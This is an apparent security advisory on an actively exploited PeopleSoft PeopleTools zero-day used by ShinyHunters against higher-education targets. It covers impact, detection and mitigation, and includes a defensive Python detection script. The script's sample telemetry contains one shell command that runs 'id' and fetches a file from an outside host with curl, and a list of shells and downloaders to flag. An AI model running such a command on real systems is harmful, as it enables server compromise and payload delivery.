CVE-2026-35273 Oracle PeopleSoft Zero-Day RCE

Oracle's PeopleSoft PeopleTools is affected by CVE-2026-35273, a critical zero-day Remote Code Execution (RCE) vulnerability that is being actively exploited in the wild by the cybercrime group ShinyHunters. The flaw allows unauthenticated attackers to gain full control of affected servers. Oracle has not yet published a CVSS score for CVE-2026-35273, but an unauthenticated RCE under active exploitation should be treated as maximum severity regardless of the eventual rating.

The exploitation campaign, first identified by Mandiant and Google Threat Intelligence Group, commenced no later than May 27, 2026. It primarily targets organizations in the higher education sector, with over 100 entities potentially compromised. This widespread activity has led to significant data theft and subsequent extortion demands, showing the immediate and severe risk posed by this vulnerability.

Oracle acknowledged the vulnerability and provided preliminary mitigation advice on June 12, 2026, roughly two weeks after the earliest observed exploitation. As of this report, a definitive patch for CVE-2026-35273 remains unavailable. Organizations running Oracle PeopleSoft PeopleTools are urged to implement all available mitigations and to enhance monitoring so that exploitation attempts can be detected and contained.

What is CVE-2026-35273 and why is it critical?

CVE-2026-35273 is an unauthenticated Remote Code Execution (RCE) vulnerability present in Oracle PeopleSoft PeopleTools, which is currently under active exploitation by the ShinyHunters cybercrime group. This defect permits an attacker to execute arbitrary code on a vulnerable server without needing any prior authentication.

CVE-2026-35273 is critical for several reasons. Firstly, RCE vulnerabilities are among the most severe, as they grant attackers the ability to run malicious code directly on a target system. This can lead to complete compromise of the server, including data exfiltration, system modification, or the establishment of persistent access. Secondly, the vulnerability is unauthenticated, meaning an attacker does not require valid credentials or session tokens to initiate the exploit. This significantly broadens the attack surface, allowing any threat actor with network access to a vulnerable instance to attempt exploitation.

Thirdly, CVE-2026-35273 is a zero-day vulnerability: no fix from Oracle was publicly available when exploitation began. Affected organizations are therefore left without a patch and must rely on mitigations that may not fully prevent exploitation. PeopleTools is the runtime and development platform underlying every PeopleSoft application, including Human Resources (HR) and Customer Relationship Management (CRM), so a flaw in it is reachable regardless of which application is deployed on top of it. Compromise of systems hosting such data can have far-reaching consequences for sensitive employee, student, and customer information.

Impact and Risks Associated with CVE-2026-35273

Attackers exploiting CVE-2026-35273 can achieve unauthenticated remote code execution, leading directly to server takeover, full data exfiltration, and subsequent extortion attempts against victim organizations. The direct impact is the compromise of the underlying PeopleSoft server, enabling adversaries to access, steal, or manipulate sensitive information stored or processed by the system.

Organizations using Oracle PeopleSoft PeopleTools are at risk, with a pronounced targeting of the higher education sector. Google and Mandiant intelligence indicates that 68% of the potential victim pool for this campaign comprises educational institutions, predominantly located in the United States. This specific targeting may be indicative of the prevalence of exposed PeopleSoft instances within this sector, or the perceived value of the data held by these entities.

The nature of the data typically managed by Oracle PeopleSoft applications, such as student records, staff payroll information, human resources databases, and customer details, makes it highly valuable to threat actors. ShinyHunters, a financially motivated cybercrime group, specializes in data theft and subsequent extortion. Their modus operandi involves exfiltrating large volumes of sensitive data and then threatening to publish it publicly unless a ransom is paid. The University of Nottingham confirmed a significant amount of student data was stolen during a cyberattack linked to this campaign, with ShinyHunters subsequently leaking portions of the school's data.

The real-world reach of this campaign is substantial, with Mandiant and Google alerting more than 100 organizations to potentially vulnerable endpoints. The ongoing nature of the campaign, with ShinyHunters actively sending extortion demands as recently as June 12, 2026, indicates a sustained and evolving threat. Beyond Google's immediate visibility, additional victims may be impacted, broadening the overall scope of the incident. The financial and reputational ramifications for compromised organizations are severe, encompassing potential regulatory fines, legal liabilities, reputational damage, and loss of trust among constituents.

Exploitation Chain and Threat Actor Activity

Exploitation of CVE-2026-35273 involves unauthenticated attackers abusing a critical defect in Oracle PeopleSoft PeopleTools to obtain remote code execution, with the earliest observed activity dating back to at least May 27, 2026. Because no valid credentials are required, the initial access phase needs nothing more than network reachability to the vulnerable service. The primary precondition for exploitation is therefore a PeopleSoft PeopleTools instance exposed to the attacker, which in the observed campaign means instances reachable from the internet.

The threat actor behind this ongoing campaign is ShinyHunters, a notorious cybercrime group recognized for its focus on data theft and extortion. The group's operational pattern typically involves identifying vulnerable systems, exploiting them to gain unauthorized access, exfiltrating large quantities of sensitive data, and then publicly exposing or threatening to expose this data as a means of coercing victims into paying a ransom. This activity aligns with previous campaigns by ShinyHunters targeting Oracle products, an area of focus for the group as extensively documented in our analysis of ShinyHunters' Oracle PeopleSoft zero-day operations.

The timeline shows a significant window during which organizations were vulnerable without a vendor-supplied patch. Exploitation commenced no later than May 27, 2026. Oracle formally disclosed the vulnerability and provided mitigation steps on June 12, 2026, approximately two weeks after the attacks began, and as of this report no patch has followed. This gap illustrates the challenge of zero-day threats: active exploitation precedes public disclosure and the availability of official fixes. Our team has previously reported on aspects of this vulnerability in our analysis of Oracle PeopleSoft CVE-2026-35273 RCE.

ShinyHunters has been observed stealing data, naming victims, and publishing allegedly stolen information. The University of Nottingham's confirmation of a data security incident and the subsequent leak of student data by ShinyHunters is a concrete example of the group's operational tactics. This public shaming and data exposure is a standard element of their extortion model, increasing pressure on victims to comply with ransom demands. The group's activities here, data exfiltration followed by extortion, are consistent with its earlier operations against Oracle products covered in our previous reporting on ShinyHunters.

Which products and versions are affected by CVE-2026-35273?

CVE-2026-35273 specifically impacts Oracle PeopleSoft PeopleTools. While Oracle has confirmed the vulnerability within this product line, specific affected versions have not been publicly detailed by the vendor at the time of this report. This implies that organizations running any version of Oracle PeopleSoft PeopleTools should consider their installations potentially vulnerable until further specific guidance or patches are released.

The broad nature of "PeopleSoft PeopleTools" as a product suite suggests that the vulnerability may reside in a core component common across various deployments, regardless of the specific PeopleSoft application (e.g., HR, CRM) being used.

The lack of precise version numbers for affected software typically means that a wide range of deployments could be susceptible. Therefore, administrators should assume that all publicly exposed instances of Oracle PeopleSoft PeopleTools are at risk and prioritize applying any forthcoming patches or implementing all recommended mitigations.

Detection Strategies for CVE-2026-35273 Exploitation

Detecting exploitation of CVE-2026-35273 requires vigilant and proactive monitoring of Oracle PeopleSoft PeopleTools environments for anomalous process execution, unusual network activity, and indicators of data staging or exfiltration. Because the vulnerability is an unauthenticated RCE, a successful attack will not show up as failed logins or account lockouts; the first observable artifacts are the malicious request itself and the processes or connections the server creates as a result.

Organizations should implement full logging and monitoring across their PeopleSoft infrastructure, covering the web tier, the application server tier and the underlying operating system. Key detection strategies include:

  • Log Analysis:
      • Web Server Logs: Monitor for unusual or malformed HTTP requests against PeopleSoft PeopleTools endpoints, especially requests that deviate from normal user or application behavior. Look for suspicious payloads and long, encoded parameters, and correlate bursts of such requests from a single source with subsequent server-side activity.
      • Application Logs: Scrutinize PeopleSoft application server logs for errors, unexpected behavior, or unauthorized administrative actions that may indicate a compromise.
      • Operating System Event Logs: Look for process creation by the PeopleSoft service account or its server processes (e.g., cmd.exe, powershell.exe, wscript.exe on Windows; sh, bash, curl on Linux) that deviates from baseline activity. Pay particular attention to unexpected child processes that execute shell commands or call system utilities.
      • Authentication Logs: Exploitation itself is unauthenticated, but post-exploitation activity may involve creating new user accounts or modifying existing ones, which is visible in authentication and account-management logs.
  • Endpoint Detection and Response (EDR) Queries:
      • Process Monitoring: Create EDR rules that flag anomalous child processes of the PeopleSoft server processes (typically the WebLogic java process on the web tier and the Tuxedo PSAPPSRV processes on the application tier). Any interpreter, script host or download utility spawned from these parents is outside their normal operation.
      • File System Monitoring: Monitor critical PeopleSoft directories and files for unauthorized modifications, creation of new executable files, or staging of data for exfiltration (for example, large archives appearing in temporary or web-accessible directories).
      • Network Connections: Identify outbound connections initiated by PeopleSoft processes to unusual or external IP addresses, especially those associated with command-and-control (C2) infrastructure or data exfiltration. Allowlist the integration endpoints the application server legitimately contacts so that the remaining alerts stay actionable.
      • Registry/Configuration Changes: Monitor for suspicious modifications to system registry keys or configuration files that could establish persistence or alter system behavior.
  • Network Traffic Analysis:
      • Traffic Anomalies: Baseline normal traffic to and from PeopleSoft PeopleTools servers and look for sudden spikes in outbound data transfer, particularly to suspicious external destinations.
      • Protocol Deviations: Identify the use of unusual protocols or non-standard ports by PeopleSoft servers.
      • Known IOCs: Specific Indicators of Compromise (IOCs) for exploitation of CVE-2026-35273 by ShinyHunters have not been publicly released. Continuously integrate and scan for emerging IOCs from trusted threat intelligence feeds related to ShinyHunters or similar data exfiltration campaigns.
  • File Integrity Monitoring (FIM):
      • Implement FIM on PeopleSoft servers to detect unauthorized changes to critical system files, application binaries, and configuration files.

Regular auditing of security configurations, user accounts, and access permissions within the PeopleSoft environment can also help identify post-exploitation lateral movement or privilege escalation attempts.
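As an added illustration (not code from the original advisory, from Oracle, or from Mandiant/Google), the following Python script runs the three kinds of checks described above, web-tier log analysis, process-tree monitoring and outbound-connection review, over a few constructed telemetry records. The PIA URL prefixes and the WebLogic java/PSAPPSRV process names reflect the standard PeopleSoft architecture; the query-length threshold, the interpreter list and the sample records are assumptions chosen for the example, not published indicators for CVE-2026-35273.

```python
"""Detection heuristics for PeopleSoft PeopleTools hosts: scans constructed
web-tier access log lines, EDR process-creation events and connection events.
Thresholds and process lists are assumed baselines, not vendor-published IOCs."""
import ipaddress
import re
from dataclasses import dataclass

# PeopleSoft Pure Internet Architecture (PIA) URL prefixes: portal, content, Integration Gateway.
PIA_PREFIXES = ("/psp/", "/psc/", "/psigw/")
# Processes that host PeopleSoft tiers: WebLogic java on the web tier, Tuxedo PSAPPSRV on the app tier.
PS_PARENTS = {"java", "java.exe", "psappsrv", "psappsrv.exe"}
# Interpreters and download utilities those server processes should never spawn (assumed baseline).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "certutil.exe", "sh", "bash", "python", "python3", "curl", "wget"}
MAX_QUERY_LEN = 400  # assumed threshold for a "long" query string on a PIA endpoint
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Combined-format access log line (Apache/WebLogic style).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')


@dataclass
class Finding:
    rule: str
    detail: str


def looks_encoded(query: str) -> bool:
    """True when percent-escapes dominate the query or it carries a long base64-like run."""
    pct_chars = 3 * len(re.findall(r"%[0-9A-Fa-f]{2}", query))
    longest_b64 = max((len(m) for m in re.findall(r"[A-Za-z0-9+/=]{40,}", query)), default=0)
    return pct_chars > len(query) // 2 or longest_b64 >= 40


def scan_access_log(lines):
    """Flag PIA requests with unusually long or heavily encoded query strings."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m or not m["path"].startswith(PIA_PREFIXES):
            continue
        route, _, query = m["path"].partition("?")
        if len(query) > MAX_QUERY_LEN or looks_encoded(query):
            findings.append(Finding("web.long_or_encoded_query",
                                    f"{m['ip']} {m['method']} {route} status={m['status']} qlen={len(query)}"))
    return findings


def scan_process_events(events):
    """Flag a PeopleSoft web/app server process spawning a shell, script host or downloader."""
    return [Finding("proc.server_spawned_interpreter", f"{e['parent']} -> {e['image']} :: {e['cmdline']}")
            for e in events
            if e["parent"].lower() in PS_PARENTS and e["image"].lower() in SUSPICIOUS_CHILDREN]


def scan_connections(conns, trusted_nets=()):
    """Flag outbound connections from PeopleSoft processes (or their children) that leave
    RFC 1918 space and are not in the allowlist of known partner/integration networks."""
    allow = RFC1918 + [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for c in conns:
        if c["image"].lower() not in PS_PARENTS | SUSPICIOUS_CHILDREN:
            continue
        dst = ipaddress.ip_address(c["dst"])
        if any(dst in net for net in allow):
            continue
        findings.append(Finding("net.outbound_from_ps_process", f"{c['image']} -> {c['dst']}:{c['port']}"))
    return findings


# Constructed sample telemetry (not real traffic; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges).
SAMPLE_ACCESS = [
    '10.0.0.5 - - [27/May/2026:09:00:01 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 200 5120',
    '198.51.100.23 - - [27/May/2026:09:00:07 +0000] "POST /psc/ps/EMPLOYEE/HRMS/c/EXAMPLE.GBL?ICAction='
    + "%41" * 150 + ' HTTP/1.1" 500 0',
    '198.51.100.23 - - [27/May/2026:09:00:09 +0000] "GET /psigw/EXAMPLE_CONNECTOR?x=' + "QUFB" * 15
    + ' HTTP/1.1" 200 0',
    '10.0.0.5 - - [27/May/2026:09:01:00 +0000] "GET /cs/ps/images/logo.png HTTP/1.1" 200 900',
]
SAMPLE_PROCS = [
    {"parent": "java", "image": "sh", "cmdline": "sh -c 'id; curl http://203.0.113.10/x'"},  # web tier spawned a shell
    {"parent": "PSPRCSRV", "image": "psae", "cmdline": "psae -CT ORACLE"},  # Process Scheduler running App Engine: expected
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe"},  # admin shell, not from a PeopleSoft tier
]
SAMPLE_CONNS = [
    {"image": "java", "dst": "10.0.1.20", "port": 9000},       # web tier -> app server: expected
    {"image": "sh", "dst": "203.0.113.10", "port": 80},        # spawned shell calling out: suspicious
    {"image": "java", "dst": "192.0.2.44", "port": 443},       # allowlisted integration partner
]


def run_all():
    return (scan_access_log(SAMPLE_ACCESS)
            + scan_process_events(SAMPLE_PROCS)
            + scan_connections(SAMPLE_CONNS, trusted_nets=("192.0.2.0/24",)))


if __name__ == "__main__":
    for f in run_all():
        print(f"[{f.rule}] {f.detail}")
```

In production the inputs would be the web tier access logs, Sysmon or EDR process-creation events and network-connection telemetry rather than the inline lists. The trusted-network allowlist should hold the Integration Broker and partner endpoints the application server legitimately talks to; without it, routine outbound integrations would drown the one connection that matters, the shell spawned by the web tier reaching out to an unknown host.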

Remediation and Mitigation for CVE-2026-35273

As of June 12, 2026, Oracle has not released an official patch that fully remediates CVE-2026-35273. The vendor has, however, provided mitigation steps that organizations should implement immediately to reduce their exposure to the active exploitation. Given the severity of an unauthenticated RCE zero-day, proactive and stringent mitigation is essential.

Remediation and mitigation efforts should prioritize limiting exposure and monitoring for signs of compromise:

  • Apply Patches Immediately (When Available):
      • Monitor Oracle's official security advisories and patch releases closely. As soon as a patch for CVE-2026-35273 becomes available, plan and execute its deployment without delay across all affected Oracle PeopleSoft PeopleTools instances, prioritizing critical and publicly exposed systems.
  • Implement Oracle's Recommended Mitigations:
      • Specific details of Oracle's recommended mitigations were not included in the initial disclosure. Apply whatever the vendor publishes as the first priority; beyond that, the general practices for protecting a web-facing application against unauthenticated RCE are:
      • Restrict Network Access: Limit access to PeopleSoft PeopleTools instances from the internet to only essential IP ranges or trusted networks. Use firewalls to enforce strict inbound and outbound access control lists (ACLs), and place administrative access behind a VPN or bastion host.
      • Network Segmentation: Isolate PeopleSoft application servers and databases from other critical internal systems. This limits an attacker's ability to move laterally after exploitation.
      • Web Application Firewall (WAF): Deploy and properly configure a WAF in front of PeopleSoft PeopleTools instances. A WAF can block requests matching known attack patterns or traffic anomalies, but until the exploit request is publicly characterized its rules can only cover generic patterns, so treat the WAF as an additional layer and a source of request telemetry, not as a substitute for restricting access or patching.
      • Least Privilege: Ensure that the PeopleSoft application and its underlying services run with the minimum necessary privileges on the operating system, so that code execution in the web or application tier does not immediately yield administrative control of the host.
      • Disable Unused Functionality: Review and disable any PeopleSoft PeopleTools components, services, or features that are not strictly required for business operations.
      • Secure Configuration Review: Conduct a thorough review of all PeopleSoft and underlying server configurations to ensure they adhere to security best practices and hardened standards.
  • Enhanced Monitoring and Incident Response:
      • Given the active exploitation, organizations must enhance their monitoring capabilities as detailed in the detection section: rigorous log analysis, EDR monitoring, and network traffic inspection for any indicators of compromise.
      • Develop and rehearse incident response plans specifically for a PeopleSoft compromise, including procedures for isolating affected systems, forensic analysis, rotation of credentials reachable from the compromised host, data recovery, and stakeholder communication.
      • Conduct regular security audits and vulnerability assessments of PeopleSoft deployments to identify and address other potential weaknesses.

The absence of an immediate patch increases the importance of strong mitigations and continuous monitoring. Organizations should operate under the assumption that their publicly exposed PeopleSoft instances are targets and prepare for potential breaches.

Technical Takeaways

  • CVE-2026-35273 is an unauthenticated Remote Code Execution (RCE) zero-day vulnerability affecting Oracle PeopleSoft PeopleTools.
  • The ShinyHunters cybercrime group is actively exploiting this flaw, with observed activity dating back to at least May 27, 2026.
  • The primary targets are organizations in the higher education sector, particularly in the United States, leading to data theft and extortion.
  • Oracle disclosed the vulnerability and recommended mitigations on June 12, 2026, but has not yet released a patch, leaving systems exposed.
  • Immediate implementation of network access restrictions, strong logging, and enhanced monitoring for anomalous activity on PeopleSoft PeopleTools instances is critical to mitigate risk.